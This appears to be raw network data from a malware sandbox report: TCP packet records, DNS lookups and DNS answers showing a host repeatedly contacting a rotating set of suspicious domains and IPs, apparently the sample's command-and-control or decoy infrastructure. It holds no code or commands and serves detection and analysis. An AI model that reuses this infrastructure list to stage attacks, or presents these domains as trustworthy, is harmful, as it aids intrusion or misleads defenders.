                                                                                                                    Oct 24, 2024 05:09:26.712734938 CEST805003968.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:26.712783098 CEST805003968.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:26.712801933 CEST5003980192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:26.712801933 CEST5003980192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:26.712835073 CEST805003968.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:26.712884903 CEST805003968.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:26.712932110 CEST805003968.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:26.712975979 CEST5003980192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:26.712980986 CEST805003968.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:26.713033915 CEST805003968.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:26.713387012 CEST5003980192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:26.718904018 CEST805003968.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:26.718976021 CEST805003968.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:26.719033003 CEST805003968.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:26.719079971 CEST5003980192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:26.760400057 CEST5003980192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:26.778197050 CEST5003980192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:27.797614098 CEST5004080192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:27.805181026 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:27.805361032 CEST5004080192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:27.818133116 CEST5004080192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:27.825129986 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.234895945 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.234935045 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.234961987 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.234981060 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.234986067 CEST5004080192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:29.235018015 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.235022068 CEST5004080192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:29.235037088 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.235064030 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.235081911 CEST5004080192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:29.235085964 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.235110044 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.235131025 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.235157967 CEST5004080192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:29.235179901 CEST5004080192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:29.240726948 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.240776062 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.240813971 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.240933895 CEST5004080192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:29.291661978 CEST5004080192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:29.322866917 CEST5004080192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:30.342817068 CEST5004180192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:30.348561049 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:30.348721981 CEST5004180192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:30.362407923 CEST5004180192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:30.367965937 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:30.367996931 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:30.368016005 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:30.368033886 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:30.368050098 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:30.368082047 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:30.368100882 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:30.368124008 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:30.368141890 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:31.780839920 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:31.780910969 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:31.780952930 CEST5004180192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:31.780987978 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:31.781039000 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:31.781079054 CEST5004180192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:31.781089067 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:31.781136990 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:31.781171083 CEST5004180192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:31.781188965 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:31.781239986 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:31.781280041 CEST5004180192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:31.781290054 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:31.781342983 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:31.781457901 CEST5004180192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:31.786997080 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:31.787074089 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:31.787122965 CEST5004180192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:31.787131071 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:31.838408947 CEST5004180192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:31.869769096 CEST5004180192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:32.892040968 CEST5004280192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:32.898180008 CEST805004268.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:32.898400068 CEST5004280192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:32.907213926 CEST5004280192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:32.913253069 CEST805004268.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:33.813411951 CEST805004268.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:33.834315062 CEST805004268.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:33.834399939 CEST5004280192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:33.839294910 CEST5004280192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:33.844759941 CEST805004268.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:38.887001991 CEST5004380192.168.2.413.248.169.48
                                                                                                                    Oct 24, 2024 05:09:38.892527103 CEST805004313.248.169.48192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:38.892679930 CEST5004380192.168.2.413.248.169.48
                                                                                                                    Oct 24, 2024 05:09:38.902848005 CEST5004380192.168.2.413.248.169.48
                                                                                                                    Oct 24, 2024 05:09:38.908317089 CEST805004313.248.169.48192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:39.597923994 CEST805004313.248.169.48192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:39.598001003 CEST5004380192.168.2.413.248.169.48
                                                                                                                    Oct 24, 2024 05:09:40.416604996 CEST5004380192.168.2.413.248.169.48
                                                                                                                    Oct 24, 2024 05:09:40.422645092 CEST805004313.248.169.48192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:41.436980963 CEST5004480192.168.2.413.248.169.48
                                                                                                                    Oct 24, 2024 05:09:41.442943096 CEST805004413.248.169.48192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:41.443067074 CEST5004480192.168.2.413.248.169.48
                                                                                                                    Oct 24, 2024 05:09:41.457381010 CEST5004480192.168.2.413.248.169.48
                                                                                                                    Oct 24, 2024 05:09:41.463160038 CEST805004413.248.169.48192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:42.144850016 CEST805004413.248.169.48192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:42.147205114 CEST5004480192.168.2.413.248.169.48
                                                                                                                    Oct 24, 2024 05:09:42.964025021 CEST5004480192.168.2.413.248.169.48
                                                                                                                    Oct 24, 2024 05:09:42.970560074 CEST805004413.248.169.48192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:43.981728077 CEST5004580192.168.2.413.248.169.48
                                                                                                                    Oct 24, 2024 05:09:43.987633944 CEST805004513.248.169.48192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:43.987752914 CEST5004580192.168.2.413.248.169.48
                                                                                                                    Oct 24, 2024 05:09:43.998207092 CEST5004580192.168.2.413.248.169.48
                                                                                                                    Oct 24, 2024 05:09:44.004457951 CEST805004513.248.169.48192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:44.004503012 CEST805004513.248.169.48192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:44.004542112 CEST805004513.248.169.48192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:44.004580975 CEST805004513.248.169.48192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:44.004645109 CEST805004513.248.169.48192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:44.004684925 CEST805004513.248.169.48192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:44.004724026 CEST805004513.248.169.48192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:44.004761934 CEST805004513.248.169.48192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:44.004798889 CEST805004513.248.169.48192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:44.659054041 CEST805004513.248.169.48192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:44.660192966 CEST5004580192.168.2.413.248.169.48
                                                                                                                    Oct 24, 2024 05:09:45.515767097 CEST5004580192.168.2.413.248.169.48
                                                                                                                    Oct 24, 2024 05:09:45.521496058 CEST805004513.248.169.48192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:46.529040098 CEST5004680192.168.2.413.248.169.48
                                                                                                                    Oct 24, 2024 05:09:46.535440922 CEST805004613.248.169.48192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:46.535543919 CEST5004680192.168.2.413.248.169.48
                                                                                                                    Oct 24, 2024 05:09:46.543308020 CEST5004680192.168.2.413.248.169.48
                                                                                                                    Oct 24, 2024 05:09:46.549185991 CEST805004613.248.169.48192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:47.209832907 CEST805004613.248.169.48192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:47.242439985 CEST805004613.248.169.48192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:47.242547035 CEST5004680192.168.2.413.248.169.48
                                                                                                                    Oct 24, 2024 05:09:47.244221926 CEST5004680192.168.2.413.248.169.48
                                                                                                                    Oct 24, 2024 05:09:47.249865055 CEST805004613.248.169.48192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:52.265233040 CEST5004780192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:09:52.270710945 CEST80500473.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:52.275268078 CEST5004780192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:09:52.287062883 CEST5004780192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:09:52.292588949 CEST80500473.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:52.915178061 CEST80500473.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:52.918185949 CEST5004780192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:09:53.791881084 CEST5004780192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:09:53.797410011 CEST80500473.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:54.810273886 CEST5004880192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:09:54.815874100 CEST80500483.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:54.818178892 CEST5004880192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:09:54.836038113 CEST5004880192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:09:54.841635942 CEST80500483.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:55.447295904 CEST80500483.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:55.447491884 CEST5004880192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:09:56.338660002 CEST5004880192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:09:56.344129086 CEST80500483.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:57.385406971 CEST5004980192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:09:57.391109943 CEST80500493.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:57.391196012 CEST5004980192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:09:57.459743977 CEST5004980192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:09:57.465209007 CEST80500493.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:57.465255022 CEST80500493.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:57.465274096 CEST80500493.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:57.465291023 CEST80500493.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:57.465306997 CEST80500493.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:57.465523005 CEST80500493.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:57.465554953 CEST80500493.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:57.465572119 CEST80500493.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:57.465590954 CEST80500493.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:58.025417089 CEST80500493.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:58.025621891 CEST5004980192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:09:58.994771004 CEST5004980192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:09:59.000232935 CEST80500493.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:00.126544952 CEST5005080192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:10:00.132169008 CEST80500503.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:00.140038013 CEST5005080192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:10:00.182157040 CEST5005080192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:10:00.187705994 CEST80500503.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:00.777281046 CEST80500503.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:00.778218985 CEST80500503.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:00.778878927 CEST5005080192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:10:00.784028053 CEST5005080192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:10:00.789378881 CEST80500503.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:05.812974930 CEST5005180192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:10:05.818645954 CEST80500513.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:05.818849087 CEST5005180192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:10:05.831948042 CEST5005180192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:10:05.837791920 CEST80500513.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:06.449626923 CEST80500513.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:06.450222969 CEST5005180192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:10:07.340500116 CEST5005180192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:10:07.347119093 CEST80500513.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:08.357558012 CEST5005280192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:10:08.363977909 CEST80500523.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:08.364209890 CEST5005280192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:10:08.375042915 CEST5005280192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:10:08.381052017 CEST80500523.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:08.993464947 CEST80500523.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:08.993983030 CEST5005280192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:10:09.886708021 CEST5005280192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:10:09.892529011 CEST80500523.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:10.904068947 CEST5005380192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:10:10.911448002 CEST80500533.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:10.916249990 CEST5005380192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:10:10.928344011 CEST5005380192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:10:10.935795069 CEST80500533.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:10.935859919 CEST80500533.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:10.935902119 CEST80500533.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:10.935940981 CEST80500533.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:10.935980082 CEST80500533.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:10.937489033 CEST80500533.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:10.937552929 CEST80500533.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:10.937592983 CEST80500533.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:10.937632084 CEST80500533.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:11.549477100 CEST80500533.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:11.549561977 CEST5005380192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:10:12.432272911 CEST5005380192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:10:12.438008070 CEST80500533.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:13.810410976 CEST5005480192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:10:13.816102982 CEST80500543.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:13.816189051 CEST5005480192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:10:13.824707031 CEST5005480192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:10:13.830100060 CEST80500543.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:14.590037107 CEST80500543.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:14.590123892 CEST80500543.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:14.590167999 CEST80500543.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:14.590801001 CEST5005480192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:10:14.594523907 CEST5005480192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:10:14.600187063 CEST80500543.33.130.190192.168.2.4

                                                                                                                    UDP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Oct 24, 2024 05:07:05.160562992 CEST5529453192.168.2.41.1.1.1
                                                                                                                    Oct 24, 2024 05:07:05.183933020 CEST53552941.1.1.1192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:20.912019014 CEST4957353192.168.2.41.1.1.1
                                                                                                                    Oct 24, 2024 05:07:21.202991962 CEST53495731.1.1.1192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:34.732734919 CEST5707953192.168.2.41.1.1.1
                                                                                                                    Oct 24, 2024 05:07:34.755650043 CEST53570791.1.1.1192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:48.357359886 CEST5276953192.168.2.41.1.1.1
                                                                                                                    Oct 24, 2024 05:07:48.454761028 CEST53527691.1.1.1192.168.2.4
                                                                                                                    Oct 24, 2024 05:08:02.311948061 CEST5712753192.168.2.41.1.1.1
                                                                                                                    Oct 24, 2024 05:08:03.081491947 CEST53571271.1.1.1192.168.2.4
                                                                                                                    Oct 24, 2024 05:08:16.358052969 CEST5006553192.168.2.41.1.1.1
                                                                                                                    Oct 24, 2024 05:08:16.820677042 CEST53500651.1.1.1192.168.2.4
                                                                                                                    Oct 24, 2024 05:08:30.452039003 CEST5969753192.168.2.41.1.1.1
                                                                                                                    Oct 24, 2024 05:08:30.471744061 CEST53596971.1.1.1192.168.2.4
                                                                                                                    Oct 24, 2024 05:08:43.764792919 CEST5356353192.168.2.41.1.1.1
                                                                                                                    Oct 24, 2024 05:08:44.077187061 CEST53535631.1.1.1192.168.2.4
                                                                                                                    Oct 24, 2024 05:08:58.016177893 CEST6244053192.168.2.41.1.1.1
                                                                                                                    Oct 24, 2024 05:08:58.028858900 CEST53624401.1.1.1192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:11.469170094 CEST4950553192.168.2.41.1.1.1
                                                                                                                    Oct 24, 2024 05:09:11.483333111 CEST53495051.1.1.1192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:25.203161001 CEST5326853192.168.2.41.1.1.1
                                                                                                                    Oct 24, 2024 05:09:25.235223055 CEST53532681.1.1.1192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:38.858273983 CEST6519653192.168.2.41.1.1.1
                                                                                                                    Oct 24, 2024 05:09:38.881763935 CEST53651961.1.1.1192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:52.251138926 CEST5455953192.168.2.41.1.1.1
                                                                                                                    Oct 24, 2024 05:09:52.262706995 CEST53545591.1.1.1192.168.2.4
                                                                                                                    Oct 24, 2024 05:10:05.796114922 CEST5810453192.168.2.41.1.1.1
                                                                                                                    Oct 24, 2024 05:10:05.809987068 CEST53581041.1.1.1192.168.2.4

                                                                                                                    DNS Queries

                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Oct 24, 2024 05:07:05.160562992 CEST192.168.2.41.1.1.10xee27Standard query (0)www.academyinmotion.xyzA (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:07:20.912019014 CEST192.168.2.41.1.1.10xefbfStandard query (0)www.heeraka.infoA (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:07:34.732734919 CEST192.168.2.41.1.1.10xa18dStandard query (0)www.awesomearv.buzzA (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:07:48.357359886 CEST192.168.2.41.1.1.10xa13aStandard query (0)www.030002252.xyzA (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:08:02.311948061 CEST192.168.2.41.1.1.10xc15cStandard query (0)www.60881.xyzA (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:08:16.358052969 CEST192.168.2.41.1.1.10xb582Standard query (0)www.mjcregionsud.orgA (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:08:30.452039003 CEST192.168.2.41.1.1.10xe996Standard query (0)www.levelsabovetravel.infoA (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:08:43.764792919 CEST192.168.2.41.1.1.10x9012Standard query (0)www.d81dp.topA (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:08:58.016177893 CEST192.168.2.41.1.1.10xc884Standard query (0)www.numbox.liveA (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:09:11.469170094 CEST192.168.2.41.1.1.10xb125Standard query (0)www.ly0.xyzA (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:09:25.203161001 CEST192.168.2.41.1.1.10xb875Standard query (0)www.myrideguy.netA (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:09:38.858273983 CEST192.168.2.41.1.1.10xd05fStandard query (0)www.lunch.deliveryA (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:09:52.251138926 CEST192.168.2.41.1.1.10x5d69Standard query (0)www.allinathletes.bizA (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:10:05.796114922 CEST192.168.2.41.1.1.10x798bStandard query (0)www.barbequecritics.comA (IP address)IN (0x0001)false

                                                                                                                    DNS Answers

                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Oct 24, 2024 05:07:05.183933020 CEST1.1.1.1192.168.2.40xee27No error (0)www.academyinmotion.xyzacademyinmotion.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:07:05.183933020 CEST1.1.1.1192.168.2.40xee27No error (0)academyinmotion.xyz3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:07:05.183933020 CEST1.1.1.1192.168.2.40xee27No error (0)academyinmotion.xyz15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:07:21.202991962 CEST1.1.1.1192.168.2.40xefbfNo error (0)www.heeraka.info75.2.103.23A (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:07:34.755650043 CEST1.1.1.1192.168.2.40xa18dNo error (0)www.awesomearv.buzz161.97.168.245A (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:07:48.454761028 CEST1.1.1.1192.168.2.40xa13aNo error (0)www.030002252.xyz030002252.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:07:48.454761028 CEST1.1.1.1192.168.2.40xa13aNo error (0)030002252.xyz65.21.196.90A (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:08:03.081491947 CEST1.1.1.1192.168.2.40xc15cNo error (0)www.60881.xyzhuayang.302.gn301.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:08:03.081491947 CEST1.1.1.1192.168.2.40xc15cNo error (0)huayang.302.gn301.xyz107.148.177.200A (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:08:03.081491947 CEST1.1.1.1192.168.2.40xc15cNo error (0)huayang.302.gn301.xyz172.247.44.157A (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:08:16.820677042 CEST1.1.1.1192.168.2.40xb582No error (0)www.mjcregionsud.orgmjcregionsud.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:08:16.820677042 CEST1.1.1.1192.168.2.40xb582No error (0)mjcregionsud.org91.212.26.5A (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:08:30.471744061 CEST1.1.1.1192.168.2.40xe996No error (0)www.levelsabovetravel.infolevelsabovetravel.infoCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:08:30.471744061 CEST1.1.1.1192.168.2.40xe996No error (0)levelsabovetravel.info3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:08:30.471744061 CEST1.1.1.1192.168.2.40xe996No error (0)levelsabovetravel.info15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:08:44.077187061 CEST1.1.1.1192.168.2.40x9012No error (0)www.d81dp.topd81dp.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:08:44.077187061 CEST1.1.1.1192.168.2.40x9012No error (0)d81dp.top154.23.184.194A (IP address)IN (0x0001)false
                                                                                                                    Oct 24, 2024 05:08:58.028858900 CEST1.1.1.1192.168.2.40xc884No error (0)www.numbox.live63.250.47.57A (IP address)IN (0x0001)false
